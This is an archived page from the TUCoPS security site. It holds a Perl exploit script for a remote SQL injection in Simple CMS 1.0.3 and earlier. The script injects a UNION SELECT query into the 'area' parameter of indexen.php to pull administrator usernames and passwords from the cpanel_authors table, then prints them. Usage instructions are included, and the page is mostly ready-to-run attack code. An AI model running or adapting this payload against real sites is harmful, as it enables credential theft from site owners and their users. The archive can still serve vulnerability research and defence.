TUCoPS :: Web :: CMS / Portals :: bx1980.htm

Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit
Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit
Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit



#!/usr/bin/perl=0D
=0D
# Simple CMS <= 1.0.3 (?area=) Remote SQL Injection Exploit=0D
# Code by JosS | Jose Luis G=F3ngora Fern=E1ndez=0D
# Contact: sys-project[at]hotmail.com=0D
# Spanish Hackers Team / Sys - Project=0D
# http://www.spanish-hackers.com=0D 
# special thanks to ka0x=0D
=0D
=0D
print "\t\t########################################################\n\n";=0D
print "\t\t#   Simple CMS <= 1.0.3 Remote SQL Injection Exploit   #\n\n";=0D
print "\t\t#                       by JosS                        #\n\n";=0D
print "\t\t########################################################\n\n";=0D
=0D
use strict;=0D
use LWP::UserAgent;=0D
=0D
my $victim = $ARGV[0];=0D
=0D
 if(!$ARGV[0]) {=0D
    print "\n[x] Simple CMS <= 1.0.3 Remote SQL Injection Exploit\n";=0D
    print "[x] written by JosS - sys-project[at]hotmail.com\n";=0D
    print "[x] usage: perl xpl.pl [host]\n";=0D
print "[x] example: http://localhost/path/\n\n";=0D 
    exit(1);=0D
 }=0D
 =0D
    print "\n[+] connecting in $victim...\n";=0D
    my $cnx = LWP::UserAgent->new() or die;=0D
    my $go=$cnx->get($victim."/indexen.php?area=-1+union+select+1,concat(0x5f5f5f5f,0x5b215d20757365723a20,UName,0x20205b215d20706173733a20,PWord,0x5f5f5f5f),3,4,5+from+cpanel_authors/*");=0D
    if ($go->content =~ m/____(.*?)____/ms) {=0D
        print "$1\n";=0D
    } else {=0D
        print "\n[-] exploit failed\n";=0D
    }

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH